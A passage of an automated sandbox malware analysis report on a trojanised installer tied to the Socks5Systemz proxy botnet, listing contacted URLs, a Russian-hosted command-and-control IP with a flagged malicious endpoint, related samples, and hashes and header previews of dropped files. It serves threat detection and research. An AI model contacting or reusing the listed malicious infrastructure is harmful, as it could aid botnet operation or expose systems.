                                                • Avira URL Cloud: safe
                                                unknown
                                                https://188.119.66.185/Cbsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bingmapsportal.comsvchost.exe, 00000003.00000002.1376008864.000001769B213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375597565.000001769B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://188.119.66.185/Jbsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375456752.000001769B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.innosetup.com/list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.drfalse
                                                      high
                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://188.119.66.185/ographybsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000003.00000002.1376167533.000001769B277000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375318633.000001769B275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375456752.000001769B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000003.00000003.1375621378.000001769B249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375663325.000001769B231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375609527.000001769B24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinelist.exefalse
                                                                  high
                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375535185.000001769B25E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://188.119.66.185/&Du=bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000003.00000003.1375609527.000001769B24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://188.119.66.185/MHbsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://188.119.66.185/)bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://188.119.66.185/N/bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.remobjects.com/psUlist.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.drfalse
                                                                              high
                                                                              https://dynamic.tsvchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://188.119.66.185/h5bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://188.119.66.185/vbsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.remobjects.com/pslist.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.drfalse
                                                                                        high
                                                                                        https://www.easycutstudio.com/support.htmllist.exe, 00000000.00000002.2501420585.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252011519.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252079119.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254668449.0000000003230000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502938488.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254793591.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502072974.0000000000786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000003.00000003.1375390941.000001769B26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              188.119.66.185
                                                                                              unknownRussian Federation
                                                                                              209499FLYNETRUfalse
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1577465
                                                                                              Start date and time:2024-12-18 13:58:09 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 39s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:15
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:list.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.evad.winEXE@14/31@1/1
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 91%
                                                                                              • Number of executed functions: 172
                                                                                              • Number of non-executed functions: 322
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 20.12.23.50
                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • VT rate limit hit for: list.exe
                                                                                              TimeTypeDescription
                                                                                              09:47:31API Interceptor427281x Sleep call for process: bsoftvideocapture33.exe modified
                                                                                              09:47:57API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              188.119.66.185newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                    newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                        Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                            GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                              bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  No context
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  FLYNETRUnewwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  51c64c77e60f3980eea90869b68c58a8newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  cd#U9988.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                  • 188.119.66.185
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dllnewwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                    stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                        newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                          steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                            AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                              Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3409347
                                                                                                                                      Entropy (8bit):6.363850056196269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:vyU0yCdW+Hrrg6L7aXt8KiIt69RoRWEZhig/nm5i4WrzG3Hg:vj0PxLE6Y8KiIs9RQ7Zhig/nm5BV3Hg
                                                                                                                                      MD5:A5B9D0E5F04BC3D01C9E97A61F27EB8F
                                                                                                                                      SHA1:7A08B8C0D7C8223F79DFFA1EA3C7415EC298DB27
                                                                                                                                      SHA-256:736FBECCE9DB80A4E4D376AFBB653CB4356912E75D6B805303D09E8129F07C83
                                                                                                                                      SHA-512:AE55F4FC99A54D40C4912F562805B644BC05F40D9A9673D943F52A59DC3D049387DA796E96C984AA3C70CC41B5F2E1196FADC4D55EE6AE5241B4F5A869918E13
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...0vag.....................l......4D............@..........................`4.......4.....................................,........@..................................................................................T..........................._aett_1............................ ..`_aftt_1..-..........................@..@_agtt_1..d.......2..................@....rsrc........@......................@..@_ahtt_1..@... ...?..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):645592
                                                                                                                                      Entropy (8bit):6.50414583238337
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: newwork.exe.1.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: stail.exe.3.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: newwork.exe.1.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:ISO-8859 text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8
                                                                                                                                      Entropy (8bit):2.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oi:oi
                                                                                                                                      MD5:E195F84642A0937D5A9ACA8D8BD2E365
                                                                                                                                      SHA1:34734EB8662139D044B17BD2D32E5B12FEBE2695
                                                                                                                                      SHA-256:6AB49F960467128016D8A129BFC4955B332A27B6416A5C833F31B54A23071E01
                                                                                                                                      SHA-512:54FFCB519385AF9BFEE0ADA78E4C822724872E2AE900AEC91035CD911095B4F3AB549AA6A28959DFDF02022165DA13487F5C7B2FD6F26D24C577AB4B127DE6AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:V.bg....
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4
                                                                                                                                      Entropy (8bit):0.8112781244591328
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:2B197A84C60EC779B10736BB6475B5E9
                                                                                                                                      SHA1:C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
                                                                                                                                      SHA-256:0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
                                                                                                                                      SHA-512:702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....
                                                                                                                                      Process:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):128
                                                                                                                                      Entropy (8bit):2.9012093522336393
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                                                                      MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                                                                      SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                                                                      SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                                                                      SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):265728
                                                                                                                                      Entropy (8bit):6.4472652154517345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                                                                                      MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                                                                                      SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                                                                                      SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                                                                                      SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):78183
                                                                                                                                      Entropy (8bit):7.692742945771669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):176128
                                                                                                                                      Entropy (8bit):6.204917493416147
                                                                                                                                      Encrypted:false
